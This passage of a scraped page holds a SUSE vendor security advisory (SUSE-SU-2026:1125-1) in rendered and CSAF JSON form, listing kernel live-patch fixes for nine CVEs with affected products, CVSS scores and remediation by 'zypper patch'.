"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1125-1
Vulnerability from csaf_suse - Published: 2026-03-27 14:04 - Updated: 2026-03-27 14:04Summary
Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150700.51 fixes various security issues
The following security issues were fixed:
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1121
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.51 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1125,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1121",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1125-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1125-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261125-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1125-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025019.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 0 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T14:04:13Z",
"generator": {
"date": "2026-03-27T14:04:13Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1125-1",
"initial_release_date": "2026-03-27T14:04:13Z",
"revision_history": [
{
"date": "2026-03-27T14:04:13Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
